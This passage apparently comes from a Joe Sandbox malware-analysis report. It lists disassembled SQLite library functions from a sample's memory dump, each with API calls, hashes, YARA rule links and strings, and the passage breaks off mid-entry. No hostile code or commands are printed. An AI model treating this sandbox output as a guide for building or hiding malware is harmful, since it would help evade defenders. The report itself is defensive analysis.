                                                    • Opcode Fuzzy Hash: 6e355b272afe9ac69e58bbb01d13da570659c931cfd7aa6ee8c14bb6a499c4c6
                                                    • Instruction Fuzzy Hash: 8D112374A0430A8BCB04CF5AD49099AFBA5FF89354F24966AE8589B301C738E991CBD5
                                                    Function 61E2904F Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E290AD
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 9731e8b2b020f7283ae854ee35fefef46dc1f8e69e861dc01f4e1663e7cab58c
                                                    • Instruction ID: a0da23f197f5a053fbfff5b95af44180b6db2fb1cab7e7d5e8ab619edf5c01f0
                                                    • Opcode Fuzzy Hash: 9731e8b2b020f7283ae854ee35fefef46dc1f8e69e861dc01f4e1663e7cab58c
                                                    • Instruction Fuzzy Hash: 8B014B746003469BC700CF6AD490A4AFBA4FF89368F18C669E8188B301D375E991CBD0
                                                    Function 61E28EC7 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28F1D
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 79d2abaaa01e31b2387b6c0a11d25d2206577272084cb964c22fd39ba37a0657
                                                    • Instruction ID: 0c5f811000c111a96f99d3c2d0e114ce4dc039598fb71131239c1bf0b908033a
                                                    • Opcode Fuzzy Hash: 79d2abaaa01e31b2387b6c0a11d25d2206577272084cb964c22fd39ba37a0657
                                                    • Instruction Fuzzy Hash: 04F0C23460065A9BCB00AF69E8C489EFBF4FF8C368B14C068ED889B314E730D965C791
                                                    Function 61E28F2C Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 6ad39b1d9bb17ea39921ab2ce260782e00b0a692ce875eb853be45023cb6578c
                                                    • Instruction ID: 31f23ef00c17e7c281be110ab000f89f69d3cbab9ee09121c473e50d283bc398
                                                    • Opcode Fuzzy Hash: 6ad39b1d9bb17ea39921ab2ce260782e00b0a692ce875eb853be45023cb6578c
                                                    • Instruction Fuzzy Hash: 9BF03A7960021A9B8B00DF69D9C088FB7F9EF89264B14C129EC049B315D230E956CF91
                                                    Function 61E28FA1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 61E28BD3: sqlite3_log.SQLITE3 ref: 61E28C01
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E28FC4
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_logsqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 1465156292-0
                                                    • Opcode ID: 39b967f36d2344517dab18db8288f6b2f46d494955a9ae8965b90665f3d6c83c
                                                    • Instruction ID: 94e6212fb5503395867072a3df25548b68e5ff6dd942858cc11d62d7ab50309f
                                                    • Opcode Fuzzy Hash: 39b967f36d2344517dab18db8288f6b2f46d494955a9ae8965b90665f3d6c83c
                                                    • Instruction Fuzzy Hash: 11E08C78A04209ABDB00DF65C8C084BB7F9EF88258F24C269EC084B305E330E990CB81
                                                    Function 61E28F7B Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_bind_int64.SQLITE3 ref: 61E28F9A
                                                      • Part of subcall function 61E28F2C: sqlite3_mutex_leave.SQLITE3 ref: 61E28F6B
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_bind_int64sqlite3_mutex_leave
                                                    • String ID:
                                                    • API String ID: 3064317574-0
                                                    • Opcode ID: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                    • Instruction ID: 42b52b883f39ace7a39e0c93dd9b57fac7a08e6f18f9e06e454c31818c297b6d
                                                    • Opcode Fuzzy Hash: ce01ef94e47e0f3b5e3022edffbc238ed3a861089da3a055ee794e226609d537
                                                    • Instruction Fuzzy Hash: 7BD06CB4909309ABCB00EF29C48584ABBE4AF88254F40C86DB898C7310E2B4E8408B92
                                                    Function 61E28E33 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 673fd18e6871f487617b58920c7c5fc27d78a49b344a1f860f06d9550f36960b
                                                    • Instruction ID: 3dd2f6eaaaa5abff5e5a8f7a39b25ebc1ca5b1cac78a858567a84518770ed609
                                                    • Opcode Fuzzy Hash: 673fd18e6871f487617b58920c7c5fc27d78a49b344a1f860f06d9550f36960b
                                                    • Instruction Fuzzy Hash: DC0128B1A0421D9BCF00CE49D891AEEB7B5FB88364F68812AF91497341D335E912CBA0
                                                    Function 61E28DC5 Relevance: .0, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a059ed515b27592538a8ce055316eb2b2323de5fe558178617c95b7af566145
                                                    • Instruction ID: 2a2db6c8903a4e009536c7223356770c672bcedd38e15fec10d06be92644c255
                                                    • Opcode Fuzzy Hash: 2a059ed515b27592538a8ce055316eb2b2323de5fe558178617c95b7af566145
                                                    • Instruction Fuzzy Hash: ECF030756092189BCB04CE08D4A1A9A77E8FB09378F20C22BFC1587340C771E955CBD0
                                                    Function 61E135A4 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 02c5e3755ad897b5586cd3745fe4347b5bc3bbdc5e12d003d79a1ce0e51cae0f
                                                    • Instruction ID: 92de6ce782d88d6d9f80a8e994720572df7e14f66ca8e71a51ce8308ba338284
                                                    • Opcode Fuzzy Hash: 02c5e3755ad897b5586cd3745fe4347b5bc3bbdc5e12d003d79a1ce0e51cae0f
                                                    • Instruction Fuzzy Hash: 4FD0E2363092085FBB00CDA9A8C0A26B79EEA9823CBB4C676ED188A305D632D8114290
                                                    Function 61E28EA0 Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                    • Instruction ID: 254c523733e4931b9b79b7b3648eb47f4e0286b50a9c231a246a71c67601ad7b
                                                    • Opcode Fuzzy Hash: e41ed7868823feecbe9f7a8037c94bafbb7f30954735038eee146dcf54c940b3
                                                    • Instruction Fuzzy Hash: B9D042B460530DABDB00CF05D8C599ABBA4FB08264F508119ED1847301C371E9508AA1
                                                    Function 61E28E0C Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                    • Instruction ID: 493d9bcea2d1f9fb15861cfe04bc275ff66fe191a89a333723e62edfd142ba05
                                                    • Opcode Fuzzy Hash: 0cd79c278022c2af276d7ad662afd0b40ecf5fd40577ade0c20f6c2bf6da0c7d
                                                    • Instruction Fuzzy Hash: FCD042B460530DABDB00CF05D8C199ABBA4FB08364F508119ED1847301C371E9508AA1
                                                    Function 61E035DF Relevance: .0, Instructions: 12COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db5756c17c587a7421e1136b0478b2b4a11d8a8c54048c6d8f40eaa52f3e5f1f
                                                    • Instruction ID: d20acb1bed3b7fe3a57994a063109c772e707e3bc3ea149b0052c0cf2ce1ce72
                                                    • Opcode Fuzzy Hash: db5756c17c587a7421e1136b0478b2b4a11d8a8c54048c6d8f40eaa52f3e5f1f
                                                    • Instruction Fuzzy Hash: FFC08C3034430D8F6B00CDFFD440E6233E8AB48B20710C011E818CBB20EA31FD518980
                                                    Function 61E035CD Relevance: .0, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                    • Instruction ID: 2d7a351ef1d2a905593dd99db54b5f5cfcc2e73e80e4f5af8b1fdc1c1156de29
                                                    • Opcode Fuzzy Hash: 40cad0428ba2cec2f3835856280400d4fd42dbc754fd2a6d6e7cded720f8f0bd
                                                    • Instruction Fuzzy Hash: 4EB09B2071420D465B14CF54944097777ED7B84905714C455981C85505E731D49151C0
                                                    Function 61E38F24 Relevance: 38.7, APIs: 16, Strings: 6, Instructions: 209COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E38F96
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E38FC7
                                                      • Part of subcall function 61E23290: sqlite3_vsnprintf.SQLITE3 ref: 61E232B1
                                                    • sqlite3_free.SQLITE3 ref: 61E3910B
                                                    • sqlite3_free.SQLITE3 ref: 61E39148
                                                    • sqlite3_free.SQLITE3 ref: 61E39183
                                                    • sqlite3_snprintf.SQLITE3 ref: 61E391B5
                                                    • sqlite3_randomness.SQLITE3 ref: 61E391D1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_randomnesssqlite3_vsnprintf
                                                    • String ID: etilqs_$winGetTempname1$winGetTempname2$winGetTempname3$winGetTempname4$winGetTempname5
                                                    • API String ID: 3041771859-3409217566
                                                    • Opcode ID: 0287607e9e057ee634fc200599fb2f0aaad230c4f20c320179b9d33d80f1f845
                                                    • Instruction ID: 7fb6d1312c707228c256405ab87afbf781cadd6ec7cb34b7583ad502e006dd1f
                                                    • Opcode Fuzzy Hash: 0287607e9e057ee634fc200599fb2f0aaad230c4f20c320179b9d33d80f1f845
                                                    • Instruction Fuzzy Hash: BD818F70A0CB568FD7009F79898466EBBF5AFCA308F61C92DD4899B345DB38C841DB52
                                                    Function 61E2642E Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_snprintf$sqlite3_mutex_entersqlite3_win32_is_nt
                                                    • String ID: \$winFullPathname1$winFullPathname2$winFullPathname3$winFullPathname4
                                                    • API String ID: 3752053736-2111127023
                                                    • Opcode ID: 64b7be50d4d4a29ef9d19045565e76aba923461cdbedc14224070f64c9b9c3a2
                                                    • Instruction ID: 97d5cccca0e146ae615e7dd44fc44154149000bc29f5e664eca65d0fdc20afb3
                                                    • Opcode Fuzzy Hash: 64b7be50d4d4a29ef9d19045565e76aba923461cdbedc14224070f64c9b9c3a2
                                                    • Instruction Fuzzy Hash: CD712470A086858FDB00EF69C59535EBBF1BF8A318F64C92DE8998B340D738C8458F52
                                                    Function 61E35C65 Relevance: 31.8, APIs: 15, Strings: 3, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
